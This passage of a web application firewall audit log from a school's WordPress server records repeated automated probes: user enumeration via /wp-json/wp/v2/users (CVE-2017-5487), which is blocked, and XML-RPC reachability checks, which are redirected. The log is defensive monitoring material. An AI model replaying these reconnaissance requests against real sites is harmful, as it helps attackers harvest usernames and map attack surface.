required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452356585234 4482 (- - -) Stopwatch2: 1747452356585234 4482; combined=3511, p1=417, p2=2887, p3=32, p4=23, p5=90, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ca5477d-Z-- --4a9f7b30-A-- [17/May/2025:10:26:37 +0700] aCgB7em4kjNN-hEbWjJDTgAAAFQ 103.236.140.4 50900 103.236.140.4 8181 --4a9f7b30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4a9f7b30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a9f7b30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452397830611 3201 (- - -) Stopwatch2: 1747452397830611 3201; combined=1415, p1=477, p2=905, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a9f7b30-Z-- --55cbea25-A-- [17/May/2025:10:26:46 +0700] aCgB9um4kjNN-hEbWjJDUAAAAFg 103.236.140.4 50904 103.236.140.4 8181 --55cbea25-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.72 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --55cbea25-C-- demo.sayHello --55cbea25-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --55cbea25-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452406004013 5668 (- - -) Stopwatch2: 1747452406004013 5668; combined=4154, p1=560, p2=3372, p3=32, p4=35, p5=93, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55cbea25-Z-- --89965565-A-- [17/May/2025:10:27:13 +0700] aCgCEQTOsBn9MSWb6WJwDQAAAI0 103.236.140.4 50908 103.236.140.4 8181 --89965565-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --89965565-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89965565-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452433835484 3302 (- - -) Stopwatch2: 1747452433835484 3302; combined=1457, p1=475, p2=950, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89965565-Z-- --cd2da033-A-- [17/May/2025:10:27:21 +0700] aCgCGQTOsBn9MSWb6WJwDwAAAIo 103.236.140.4 50912 103.236.140.4 8181 --cd2da033-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cd2da033-C-- demo.sayHello --cd2da033-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd2da033-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452441125640 5681 (- - -) Stopwatch2: 1747452441125640 5681; combined=4164, p1=554, p2=3387, p3=35, p4=35, p5=91, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd2da033-Z-- --3d09617d-A-- [17/May/2025:10:28:27 +0700] aCgCWwTOsBn9MSWb6WJwEgAAAJE 103.236.140.4 50918 103.236.140.4 8181 --3d09617d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.181.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.181.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d09617d-C-- demo.sayHello --3d09617d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d09617d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452507340016 5690 (- - -) Stopwatch2: 1747452507340016 5690; combined=4186, p1=564, p2=3384, p3=34, p4=45, p5=95, sr=76, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d09617d-Z-- --f682cb4f-A-- [17/May/2025:10:28:36 +0700] aCgCZHyxdQCiyU1ENFcrjgAAABg 103.236.140.4 50922 103.236.140.4 8181 --f682cb4f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f682cb4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f682cb4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452516988376 2765 (- - -) Stopwatch2: 1747452516988376 2765; combined=1252, p1=419, p2=804, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f682cb4f-Z-- --a5eebd3c-A-- [17/May/2025:10:28:42 +0700] aCgCanyxdQCiyU1ENFcrjwAAABU 103.236.140.4 50926 103.236.140.4 8181 --a5eebd3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.142 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5eebd3c-C-- demo.sayHello --a5eebd3c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5eebd3c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452522175219 5168 (- - -) Stopwatch2: 1747452522175219 5168; combined=3906, p1=480, p2=3218, p3=27, p4=31, p5=89, sr=68, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5eebd3c-Z-- --983fec12-A-- [17/May/2025:10:28:46 +0700] aCgCbgTOsBn9MSWb6WJwFgAAAJg 103.236.140.4 50930 103.236.140.4 8181 --983fec12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --983fec12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --983fec12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452526111600 2199 (- - -) Stopwatch2: 1747452526111600 2199; combined=1059, p1=319, p2=708, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --983fec12-Z-- --36510b67-A-- [17/May/2025:10:28:52 +0700] aCgCdATOsBn9MSWb6WJwFwAAAIE 103.236.140.4 50934 103.236.140.4 8181 --36510b67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.227 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --36510b67-C-- demo.sayHello --36510b67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --36510b67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452532355466 4625 (- - -) Stopwatch2: 1747452532355466 4625; combined=3607, p1=415, p2=2995, p3=23, p4=24, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36510b67-Z-- --08f4097e-A-- [17/May/2025:10:29:09 +0700] aCgChem4kjNN-hEbWjJDUQAAAEI 103.236.140.4 50938 103.236.140.4 8181 --08f4097e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --08f4097e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08f4097e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452549032245 3235 (- - -) Stopwatch2: 1747452549032245 3235; combined=1303, p1=423, p2=852, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08f4097e-Z-- --67a00732-A-- [17/May/2025:10:29:09 +0700] aCgChRKi5m5upc8uMd6jhwAAAMw 103.236.140.4 50940 103.236.140.4 8181 --67a00732-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --67a00732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67a00732-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452549040188 2801 (- - -) Stopwatch2: 1747452549040188 2801; combined=1237, p1=424, p2=782, p3=0, p4=0, p5=30, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67a00732-Z-- --35c32642-A-- [17/May/2025:10:29:14 +0700] aCgCigTOsBn9MSWb6WJwGQAAAIQ 103.236.140.4 50946 103.236.140.4 8181 --35c32642-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --35c32642-C-- demo.sayHello --35c32642-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --35c32642-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452554985435 5945 (- - -) Stopwatch2: 1747452554985435 5945; combined=4206, p1=586, p2=3398, p3=30, p4=33, p5=95, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35c32642-Z-- --a7d95e2d-A-- [17/May/2025:10:29:16 +0700] aCgCjATOsBn9MSWb6WJwGgAAAII 103.236.140.4 50948 103.236.140.4 8181 --a7d95e2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7d95e2d-C-- demo.sayHello --a7d95e2d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7d95e2d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452556253880 5170 (- - -) Stopwatch2: 1747452556253880 5170; combined=3874, p1=474, p2=3192, p3=23, p4=26, p5=93, sr=76, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7d95e2d-Z-- --364d2901-A-- [17/May/2025:10:30:35 +0700] aCgC23yxdQCiyU1ENFcrkgAAAAQ 103.236.140.4 50958 103.236.140.4 8181 --364d2901-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --364d2901-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --364d2901-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452635395919 2946 (- - -) Stopwatch2: 1747452635395919 2946; combined=1337, p1=455, p2=851, p3=0, p4=0, p5=30, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --364d2901-Z-- --72b4d461-A-- [17/May/2025:10:30:45 +0700] aCgC5QTOsBn9MSWb6WJwHwAAAIo 103.236.140.4 50962 103.236.140.4 8181 --72b4d461-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --72b4d461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72b4d461-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452645587231 2471 (- - -) Stopwatch2: 1747452645587231 2471; combined=1117, p1=372, p2=716, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72b4d461-Z-- --48c0ef20-A-- [17/May/2025:10:30:45 +0700] aCgC5QTOsBn9MSWb6WJwIAAAAI4 103.236.140.4 50964 103.236.140.4 8181 --48c0ef20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48c0ef20-C-- demo.sayHello --48c0ef20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48c0ef20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452645600279 4729 (- - -) Stopwatch2: 1747452645600279 4729; combined=3766, p1=407, p2=3146, p3=30, p4=32, p5=89, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
